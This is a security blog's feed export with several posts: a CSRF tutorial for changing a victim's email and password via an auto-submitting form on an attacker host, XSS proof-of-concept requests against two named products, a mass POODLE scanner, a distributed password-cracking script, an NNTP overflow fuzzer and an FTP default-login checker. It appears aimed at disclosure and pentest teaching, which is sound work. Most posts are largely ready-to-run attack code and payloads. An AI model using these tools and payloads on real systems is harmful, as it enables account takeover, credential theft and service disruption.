Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-74423831038875623842014-10-25T05:37:00.000-07:002014-10-25T05:48:25.372-07:00Update Users Password and Email Address Using CSRF<div class="col col-md-9">
During a recent bug bounty/pentest, I discovered a <b>Cross Site Request Forgery</b> vulnerability that allowed me to automatically update a users email address, password, credit card info, shipping address and more. This is a brief tutorial on how it was done.<br />
<br />
<b>What is Cross Site Request Forgery?</b><br />
In short, cross site request forgery allows an attacker to do certain actions on behalf of valid users (such as updating a user's password).<br />
<br />
<b>Step 1:</b> Find a form on the target website that you want to test. In the example below, it was /AccountSettings.asp.<br />
<br />
<b>Step 2: </b>Intercept the POST request using Burpsuite or any other proxy. Notice below that the POST values being submitted include the user's password, email, CC data, etc. Notice also what is <i>not</i> there: the only thing authorising the change is the session cookie, there is no anti-CSRF token or other per-request secret in the body, and the password fields can be set without supplying the current password -- every value an attacker needs is either predictable or sent automatically by the victim's browser.<br />
<br />
POST /AccountSettings.asp HTTP/1.1
<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140924 Firefox/24.0 Iceweasel/24.8.1
<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<br />
Accept-Language: en-US,en;q=0.5
<br />
Referer: www.vulnerabletocsrf.com/AccountSettings.asp?modwhat=change_a
<br />
Cookie: vsettings=; ASPSESSIONIDCACRBAAC=AOJMIBNBPHKJKPDJBHMNMGHH;
ASP.NET_SessionId=sdrlj3454lpqi4zacpnkami3; __atuvc=6%7C42;
CartID5=64D7287A97204E7C821621BE7A6174C4;
Referrer=www%2Exerosecurity%2Ecom; AffiliateID=; AffiliateTrackedToday=;
ASPSESSIONIDCCCQCCDB=CDCPFKHCDEOJKEPKDMIFDPPM;
slt=ABEC051D-1B66-494C-BD3F-54D38B3A49AD;
CustomerID=2380CC3CAA66AF2AC5C9EA2ABEC9B68BE51956AFBCC2F1A26E858B323D260F9E
<br />
Connection: keep-alive
<br />
Content-Type: application/x-www-form-urlencoded
<br />
Content-Length: 279
<br />
Host: www.vulnerabletocsrf.com<br />
<br />
modwhat=change_a&BillingID=&ShipID=&CCardID=&OrderPlaced=&ReturnTo=&Email=test123456%40mailinator.com&AddNewCustomer=&Emailagain=test123456%40mailinator.com&password=&passwordagain=&emailsubscriber=Y&btnContinue.x=35&btnContinue.y=16&NewSignup=&CustomerID=&Anonymous=&DirectLink=<br />
<br />
<br />
<b>Step 3:</b> Recreate the original POST form on your own web server. To do this, you will need to check all form field data and HTML being passed by the target website. You can do this by viewing the source code of the target website where the POST form is found. Be sure to update the POST action="" section of the form to the target URL ie. http://www.vulnerabletocsrf.com/AccountSettings.asp. You also need to update the values of each form field to the values you want to change (ie. email address, password, CC number, etc..).<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7cuRtn25PbVNlOuwZu4J2gGcHknABaZXO8nHzmA17bCpz_i6d0CA68YwQdpT6hG3I0TlbTjY8ALrDPN-A15_FWSjQp_2vUrpWP-mha8M9uOzYR-8weLQelYzPejdaMpvLdjIgmli5tbdg/s1600/csrf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7cuRtn25PbVNlOuwZu4J2gGcHknABaZXO8nHzmA17bCpz_i6d0CA68YwQdpT6hG3I0TlbTjY8ALrDPN-A15_FWSjQp_2vUrpWP-mha8M9uOzYR-8weLQelYzPejdaMpvLdjIgmli5tbdg/s1600/csrf2.png" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>NOTE:</b> You can also include Javascript to automatically submit the form as soon as a user views the page via document.forms["f1"].submit(); as seen above.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>STEP 4:</b> Now that we have our new CSRF form sitting on our web server, we can send this page to users of the site to entice them to click on our link (ie. http://evilattacker.com/test.html). If the site is vulnerable to CSRF, the form fields that we edited will be automatically submitted on the user's behalf and updated, because the browser attaches the victim's session cookie to the cross-site POST just as it would to a same-site one. It should also be noted that this can all be done via a hidden <iframe> in any website the user visits as well. The server-side fix is to tie every state-changing request to a secret the attacker cannot obtain -- a per-session anti-CSRF token checked on submit -- and, for this form in particular, to require the current password before the email or password can be changed; setting the session cookie with the SameSite attribute adds a further layer in modern browsers.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red;"><b>DISCLAIMER:</b></span> This is merely for educational purposes to teach more about the dangers of CSRF and improve security.</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-89945550276509909672014-10-17T04:52:00.000-07:002014-10-17T05:10:41.314-07:00PoodleWalk SSLv3 Scanner#!/bin/bash<br /># PoodleWalk SSLv3 Scanner v20141017 by 1N3<br /># http://treadstonesecurity.blogspot.ca<br /># Usage: ./poodlewalk.sh <CIDR|IP><br />#<br /># ABOUT:<br /># PoodWalk makes it easier to mass scan environments for systems vulnerable to the "Poodle" vulnerability. It uses unicorn scan to scan a large range of IP's or CIDR blocks for port 443. If open, poodwalk runs SSLScan for SSLv3 enabled ciphers which are vulnerable to the "Poodle" attack in CVE-2014-3566.<br />#<br /># REQUIREMENTS:<br /># Is unicornscan installed?<br /># Is sslscan installed?<br />#<br /># USAGE EXAMPLES:<br /># ./poodlewalk.sh 192.168.0.0/16 - Mass scan all hosts for port 443 and test for SSLv3 on 192.168.0.0/16<br /># for a in `cat my_list_of_domains_or_ips.txt`; do ./poodlewalk.sh $a; done; - Mass scan a text file of domains and IP's for Poodle<br />#<br /><br />echo -e "\033[1m(--==== PoodleWalk SSLv3 Scanner by 1N3"<br />echo -e "\033[1m(--==== http://treadstonesecurity.blogspot.ca"<br />tput sgr0<br />echo ""<br /><br />UNICORNSCAN=`which unicornscan`<br />SSLSCAN=`which sslscan`<br />RANGE=$1<br /><br />if [ "$UNICORNSCAN" == "" ]; then<br /> echo -e "\033[1m(--==== Unicornscan not installed! Exiting..."<br /> exit<br />fi<br /><br />if [ "$SSLSCAN" == "" ]; then<br /> echo -e "\033[1m(--==== SSLScan not installed! 
Exiting..."<br /> exit<br />fi<br /><br />if [ -z "$1" ]; then<br /> echo -e "\033[1m(--==== Usage: $0 <CIDR|IP>"<br /> exit<br />fi<br /><br />echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $RANGE"<br />for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; <br />do <br /> echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $a"<br /> sslscan --no-failed $a | egrep --color=auto 'Accepted SSLv3'<br />done<br /><br />echo -e "\033[1m(--==== Scan Complete!"<br />exit Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-23299680489639662522014-08-22T13:31:00.000-07:002014-10-17T04:56:59.624-07:00GridCrack - A Grid Based Password Cracker#!/bin/bash<br />
# GRIDCRACK v20140822 by 1N3 @ http://xerosecurity.com<br />
# <br />
# USAGE: ./gridcrack <crack/status/setup> <format><br />
#<br />
# ABOUT:<br />
# GRIDCRACK is a Linux grid based password cracker used to leverage multiple servers to crack a single hash file. <br />
#<br />
# REQUIREMENTS:<br />
# 1) Two or more Linux based servers running John The Ripper (john)<br />
# 2) root SSH keys setup for automatic login/authentication via SSH keys<br />
# 3) A large masterlist dictionary file to split amongst the configured nodes<br />
#<br />
# HOW IT WORKS:<br />
# Running ./gridcrack setup will launch the initial setup of gridcrack which will prompt for the masterlist.dic file (a large wordlist of your choice..). <br />
# From there, it will proceed to split the file into equal parts based on the number of configured nodes in this script (NUM_NODES). Next, It will transfer<br />
# the individual parts of the split wordlist to each host via SCP. From here, the user can copy/paste their hashes into the hashes.txt (/pentest/gridcrack/hashes.txt)<br />
# and run the appropriate command to begin the brute force attack (ie. ./gridcrack crack NT). From here, gridcrack will first copy the hashes.txt to each node first,<br />
# then proceed to run john on each node simultaneously using the format specified (ie. NT). Results are then displayed back to the central server as <br />
# each node finishes. A status mode is also included to show the status of john on each node (ie. ./gridcrack status NT). <br />
#<br />
#<br />
<br />
# STATIC VARS<br />
# FILL THIS OUT PRIOR TO RUNNING GRIDCRACK...<br />
# NOTE(review): nothing below validates these. With NUM_NODES empty the 'expr' division in<br />
# setup fails; with GRIDCRACK_HOME empty every path below collapses to a path under '/'.<br />
# Only NODE1..NODE3 are wired up, each bound to one fixed 'split' chunk (xaa/xab/xac), so a<br />
# NUM_NODES larger than 3 produces chunks that no node ever receives.<br />
NUM_NODES=""<br />
NODE1=""<br />
NODE2=""<br />
NODE3=""<br />
GRIDCRACK_HOME=""<br />
<br />
# CRACK MODE: copy hashes.txt to each configured node, then start john on every node in the<br />
# background (the trailing '&' on each ssh line) and return immediately without waiting;<br />
# each node's '--show' output is printed to this terminal whenever that node finishes.<br />
if [ "$1" == "crack" ]<br />
then<br />
if [ -z "$2" ]<br />
then<br />
echo "Format not set. Use ./gridcrack crack <format> to set it..."<br />
exit 1<br />
else<br />
FORMAT="$2"<br />
# TRANSFER HASHES TO EACH NODE<br />
# '2> /dev/null' hides scp failures, so a node that never received the file is not detected.<br />
echo "Transferring hashes to each node..."<br />
if [ "$NODE1" ]<br />
then<br />
scp $GRIDCRACK_HOME/hashes.txt root@$NODE1:$GRIDCRACK_HOME 2> /dev/null<br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
scp $GRIDCRACK_HOME/hashes.txt root@$NODE2:$GRIDCRACK_HOME 2> /dev/null<br />
fi<br />
<br />
if [ "$NODE3" ]<br />
then<br />
scp $GRIDCRACK_HOME/hashes.txt root@$NODE3:$GRIDCRACK_HOME 2> /dev/null<br />
fi<br />
<br />
# START CRACKING ON EACH NODE<br />
# NOTE(review): NODE1 passes '-format=' (single dash) while NODE2/NODE3 pass '--format=';<br />
# confirm the installed john accepts both spellings.<br />
echo "Starting crack mode on each node..."<br />
if [ "$NODE1" ]<br />
then<br />
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xaa -format=$FORMAT 2> /dev/null && ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show &<br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xab --format=$FORMAT 2> /dev/null && ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show & <br />
fi<br />
<br />
if [ "$NODE3" ]<br />
then<br />
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xac --format=$FORMAT 2> /dev/null && ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show & <br />
fi<br />
fi<br />
<br />
# SHOW STATUS: list john processes on each node and print what each has cracked so far.<br />
# The 'grep' filters run locally on the ssh output; the pipe is not part of the remote command.<br />
elif [ "$1" == "status" ]<br />
then<br />
if [ -z "$2" ]<br />
then<br />
echo "Format not set. Use ./gridcrack status <format> to set it..."<br />
exit 1<br />
else<br />
FORMAT="$2"<br />
echo "Checking status..."<br />
if [ "$NODE1" ]<br />
then<br />
echo "#### NODE1:"<br />
ssh root@$NODE1 ps -ef | grep john | grep hashes<br />
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show <br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
echo "#### NODE2:"<br />
ssh root@$NODE2 ps -ef | grep john | grep hashes<br />
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show <br />
fi<br />
if [ "$NODE3" ]<br />
then<br />
echo "#### NODE3:"<br />
ssh root@$NODE3 ps -ef | grep john | grep hashes<br />
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show<br />
fi<br />
fi<br />
<br />
# RUN SETUP: split the master wordlist into NUM_NODES chunks and copy one chunk to each node.<br />
elif [ "$1" == "setup" ]<br />
then<br />
echo "################"<br />
echo "Running setup..."<br />
echo "################"<br />
echo ""<br />
echo "Enter full name and path to masterlist.dic...(ie. /pentest/gridcrack/wordlists/masterlist.dic)"<br />
read MASTERLIST<br />
# Integer division: lines per chunk is floor(total / NUM_NODES), so 'split' may emit one<br />
# extra short chunk holding the remainder. $MASTERLIST is unquoted here and below.<br />
MASTERLIST_LINES=`wc -l $MASTERLIST | awk '{print $1}'`<br />
MASTERLIST_LINES=`expr $MASTERLIST_LINES / $NUM_NODES`<br />
# 'cd' is not checked; if it fails, split writes the chunks into the current directory instead.<br />
cd $GRIDCRACK_HOME/wordlists/<br />
echo "Splitting wordlists... this could take a few minutes..."<br />
split -l $MASTERLIST_LINES $MASTERLIST<br />
ls -lh $GRIDCRACK_HOME/wordlists/<br />
if [ "$NODE1" ]<br />
then<br />
echo "Creating directory structure on $NODE1..."<br />
ssh root@$NODE1 mkdir $GRIDCRACK_HOME/wordlists/ -p<br />
scp $GRIDCRACK_HOME/wordlists/xaa root@$NODE1:$GRIDCRACK_HOME/wordlists/ 2> /dev/null<br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
ssh root@$NODE2 mkdir $GRIDCRACK_HOME/wordlists/ -p<br />
scp $GRIDCRACK_HOME/wordlists/xab root@$NODE2:$GRIDCRACK_HOME/wordlists/ 2> /dev/null<br />
fi<br />
if [ "$NODE3" ]<br />
then<br />
ssh root@$NODE3 mkdir $GRIDCRACK_HOME/wordlists/ -p<br />
scp $GRIDCRACK_HOME/wordlists/xac root@$NODE3:$GRIDCRACK_HOME/wordlists/ 2> /dev/null<br />
fi<br />
<br />
# SHOW HELP SCREEN ('-h' and any unrecognised mode print the same text)<br />
elif [ "$1" == "-h" ]<br />
then<br />
echo "************* GRIDCRACK by 1N3 ********************"<br />
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"<br />
echo "************* http://xerosecurity.com *************"<br />
else<br />
echo "************* GRIDCRACK by 1N3 ********************"<br />
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"<br />
echo "************* http://xerosecurity.com *************"<br />
fi<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-2092660445684603822014-08-13T09:03:00.001-07:002014-08-13T09:09:26.266-07:00All In One SEO Pack v.2.2.2 Stored XSS<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dPbL9CAXPcHbJrEXCaUS34bpO3sYGwep2-68fnU4L9JtqFr4H29j1Iytr4V22a0M401duNJ-Kou5gspJedzxOPx3mGSg_8T94wYiGYU2n1ZNEwbs-2cbZ9vpsS93do7mna289Cc6aHrh/s1600/wordpress_XSS2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dPbL9CAXPcHbJrEXCaUS34bpO3sYGwep2-68fnU4L9JtqFr4H29j1Iytr4V22a0M401duNJ-Kou5gspJedzxOPx3mGSg_8T94wYiGYU2n1ZNEwbs-2cbZ9vpsS93do7mna289Cc6aHrh/s1600/wordpress_XSS2.png" height="90" width="400" /></a></div>
<br />
<br />
Author: 1N3<br />
Website: http://xerosecurity.com<br />
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/<br />
Affected Product: All In One SEO Pack<br />
Affected Version: 2.2.2<br />
<br />
<b>ABOUT:</b><br />
<br />
All in One SEO Pack is a WordPress SEO plugin to automatically
optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from
a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php”
page because it fails to properly sanitize the “aiosp_menulabel” form field.<span id="more-94"></span> A malicious author or admin of a site could use this flaw to secretly redirect users of a site to a malicious site or steal session cookies of other users.<br />
<br />
<br />
NOTE: The user must have the ability to publish pages on the affected WordPress site (usually the Author or Admin role is required).<br />
<br />
<b>POC:</b><br />
http://localhost/wordpress/wp-admin/post.php?post_type=page<br />
<br />
Host=localhost<br />
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0<br />
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language=en-US,en;q=0.5<br />
Accept-Encoding=gzip, deflate<br />
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page<br />
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1<br />
Content-Type=application/x-www-form-urlencoded<br />
Content-Length=1856<br />
<br />
POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3EUnknownnoreply@blogger.com1tag:blogger.com,1999:blog-3352537640011430393.post-48571467723210961032014-08-12T12:58:00.000-07:002014-08-1
2T12:58:11.572-07:00Network News Transfer Protocol (NNTP) Fuzzer<div class="entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7G5lgenGMtJDeQkkOhMdi8lMPXrE2y0OqmkbkstPN41SlVHjDaDDakY7Eg0aNM5kFhNyqP4TByoJXG1aD8mhIh3wXeC4r9vDRZ7uYi41eK1DvEBb4oGB5GrXX9Iuj6-QTd-lAqZ38xfEt/s1600/index.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7G5lgenGMtJDeQkkOhMdi8lMPXrE2y0OqmkbkstPN41SlVHjDaDDakY7Eg0aNM5kFhNyqP4TByoJXG1aD8mhIh3wXeC4r9vDRZ7uYi41eK1DvEBb4oGB5GrXX9Iuj6-QTd-lAqZ38xfEt/s1600/index.jpeg" height="156" width="320" /></a></div>
<br />
#!/usr/bin/python<br />
# Network News Transport Protocol Fuzzer by 1N3 v20140802<br />
# http://xerosecurity.com<br />
#<br />
# USAGE: NTTP_fuzz.py <IP/host> <port><br />
#<span id="more-100"></span><br />
#HELP<br />
#100 Supported Commands<br />
# MODE READER<br />
# AUTHINFO USER <username><br />
# AUTHINFO PASS <password><br />
# LIST <active|newsgroups|overview.fmt> <pattern><br />
# XGTITLE <pattern><br />
# GROUP <newsgroup><br />
# LISTGROUP <newsgroup><br />
# NEWGROUPS <yy><yymmdd> <hhmmss><br />
# OVER <range|msgid><br />
# XOVER <range|msgid><br />
# XHDR <header> <range|msgid><br />
# XPAT <header> <range|msgid> <pattern> <pattern..><br />
# NEWNEWS <newsgroup> <yymmdd> <hhmmss> <gmt|utc><br />
# STAT <msgid|number><br />
# HEAD <msgid|number><br />
# BODY <msgid|number><br />
# ARTICLE <msgid|number><br />
# POST<br />
# NEXT<br />
# LAST<br />
# HELP<br />
# DATE<br />
# QUIT<br />
import socket<br />
import time<br />
import sys, getopt<br />
# Entry point. argv[1] is the host to connect to; the port is fixed to 119 below, so the<br />
# "<port>" argument shown in the usage header at the top of the script is never read.<br />
# NOTE: Python 2 syntax (print statement, str payloads). The curly quotes are a rendering<br />
# artifact of the blog page; they must be plain ASCII quotes before this file parses.<br />
def main(argv):<br />
argc = len(argv)<br />
if argc <= 1:<br />
print “usage: %s <host>” % (argv[0])<br />
sys.exit(0)<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # NOTE(review): never used -- a fresh socket is created on every loop pass below<br />
buffer = ["X"] # seed value so len(buffer) is 1 on the first loop test<br />
counter = 100 # START VALUE<br />
target = argv[1] # SET TARGET<br />
port = “119″ # SET PORT<br />
# One TCP connection per pass: read the greeting, send AUTHINFO USER and then AUTHINFO PASS<br />
# carrying 'counter' X's, print the reply to PASS, close. The bound is tested before the<br />
# payload grows, so the last payload actually sent is 10100 bytes, not 10000.<br />
# There is no error handling: a refused or reset connection raises out of main() and the<br />
# socket is not closed on that path. On the server side this shows up as a burst of short<br />
# connections, each carrying oversized AUTHINFO credentials.<br />
while (len(buffer)) <= 10000: # END VALUE<br />
buffer=”X”*counter<br />
counter=counter+100 # MULTIPLIER<br />
print “(–==== Fuzzing ” + target + “:” + port + ” with length:” +str(len(buffer))<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
# socket.connect() returns None; 'connect' is assigned but never read.<br />
connect=s.connect((target,int(port)))<br />
data = s.recv(1024)<br />
#print “CONNECTION: ” +data<br />
s.send(‘AUTHINFO USER ‘ + buffer + ‘\r\n’)<br />
data = s.recv(1024)<br />
#print “received: ” +data<br />
s.send(‘AUTHINFO PASS ‘ + buffer + ‘\r\n’)<br />
data = s.recv(1024)<br />
print “received: ” +data<br />
s.close()<br />
#time.sleep(3)<br />
# print “\n”.join(sys.argv)<br />
# Runs on import as well as on direct execution (no __name__ guard).<br />
main(sys.argv)<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-89822255399463512312014-08-12T12:55:00.002-07:002014-08-12T12:55:57.261-07:00Anonymous FTP Login Checker<div class="entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwyEq1mFr6mD2_57R0HyEdwE5ANhh1N3an80fjFf40Wuwz-wcRnaH_T_dvgmlAVDILFB1VQ_tl2Q0K8agZSXjLNRAy23G7w80aGuOSiS5oT50hmalpqvRbZusKAvpiKHtcSn_Aq1sXh4_3/s1600/ftp-click.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwyEq1mFr6mD2_57R0HyEdwE5ANhh1N3an80fjFf40Wuwz-wcRnaH_T_dvgmlAVDILFB1VQ_tl2Q0K8agZSXjLNRAy23G7w80aGuOSiS5oT50hmalpqvRbZusKAvpiKHtcSn_Aq1sXh4_3/s1600/ftp-click.jpg" height="214" width="320" /></a></div>
<br />
#!/usr/bin/python<br />
# Anonymous FTP login checker by 1N3 v20140805<br />
# http://xerosecurity.com<br />
#<br />
# ABOUT:<br />
# This script checks the remote host for anonymous FTP accounts enabled.<br />
<span id="more-98"></span><br />
import socket<br />
import time<br />
import sys, getopt<br />
# Entry point. argv[1] is the host; port 21 is fixed below. Despite the script's title this<br />
# tries five account names, not only "anonymous", each with the account name as its password,<br />
# and prints the server's raw reply to PASS -- it does not parse the reply code itself.<br />
# NOTE: Python 2 syntax (print statement, str payloads). The curly quotes are a rendering<br />
# artifact of the blog page; they must be plain ASCII quotes before this file parses.<br />
def main(argv):<br />
argc = len(argv)<br />
if argc <= 1:<br />
print “usage: %s <host>” % (argv[0])<br />
sys.exit(0)<br />
print “(–==== Checking anonymous FTP login…\n”<br />
users=["anonymous","admin","ftp","administrator","guest"]<br />
target = argv[1] # SET TARGET<br />
# One connection per name. connect()/recv() are unguarded: a refused connection or a timeout<br />
# raises, aborts the loop and leaves the socket unclosed. Each recv(1024) assumes the whole<br />
# reply arrives in one read; a multi-line banner may be split across reads -- TODO confirm.<br />
for user in users:<br />
print “(–==== Checking user: ” +user<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect((target,21))<br />
data = s.recv(1024)<br />
s.send(‘USER ‘ +user+ ‘\r\n’)<br />
data = s.recv(1024)<br />
s.send(‘PASS ‘ +user+ ‘\r\n’)<br />
data = s.recv(1024)<br />
print data<br />
s.send(‘QUIT’ +’\r\n’)<br />
s.close()<br />
# Runs on import as well as on direct execution (no __name__ guard).<br />
main(sys.argv)<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-355178038942447352014-07-31T04:12:00.000-07:002014-07-31T04:12:34.761-07:00Lyris ListManagerWeb 8.95a Reflective XSS<div class="entry-content">
Author: 1N3<br />
Website: http://xerosecurity.com<br />
Vendor Website: http://lyris.com/us-en/products/listmanager<br />
Affected Product: Lyris ListManagerWeb<br />
Affected Version: 8.95a<br />
<br />
<b>ABOUT:</b><br />
Lyris ListManager (Lyris LM) is on-premises email
marketing software for companies that require the ability to deploy
high-volume email programs behind a firewall. Version 8.95a suffers from
a cross-site scripting (XSS) vulnerability in the “doemailpassword.tml”
page because it fails to properly sanitize the “EmailAddr” POST
variable.<span id="more-94"></span><br />
<br />
<b>POC:</b><br />
POST http://host.com/doemailpassword.tml HTTP/1.1<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Referer: http://host.com/emailpassword.tml<br />
Connection: keep-alive<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 71<br />
Proxy-Connection: Keep-Alive<br />
Host: host.com<br />
<br />
EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-80798604457702471002014-07-21T10:32:00.002-07:002014-07-21T10:41:05.536-07:00MyConnection Server (MCS) Reflective XSS<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiIe37Xf49ql2cIscqtceDbQq9IGUuU7P_VuYdQ-w6D8gHzMvGh9798xed0MQLGxomJLf6I411EbUqyedb9RErYcXCm8rXHxEMd_0m6F5Zrluym3f_bXIukTm1cI0an8WNr57DuYsCbtIQ/s1600/visualware_XSS1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiIe37Xf49ql2cIscqtceDbQq9IGUuU7P_VuYdQ-w6D8gHzMvGh9798xed0MQLGxomJLf6I411EbUqyedb9RErYcXCm8rXHxEMd_0m6F5Zrluym3f_bXIukTm1cI0an8WNr57DuYsCbtIQ/s1600/visualware_XSS1.png" height="140" width="400" /></a></div>
<br />
<br />
Author: 1N3<br />
Website: http://treadstonesecurity.blogspot.ca<br />
Vendor Website: http://www.visualware.com/<br />
Affected Product: MyConnection Server <br />
Affected Version: 9.7i (others may also be vulnerable)<br />
<br />
ABOUT:<br />
MyConnection Server (MCS) delivers a broad range of support, managed, automated and user-initiated self-help connection testing and monitoring services directly via the browser to any online customer or location anywhere in the world. Because certain GET parameters passed to the connection test page (usually test.php) are not sanitized, it is possible to inject client-side JavaScript that runs in the context of the user browsing the website. Several parameters, including testtype, ver, cm, map, lines, duration and others, appear to be vulnerable. <br />
<br />
<br />
POC:<br />
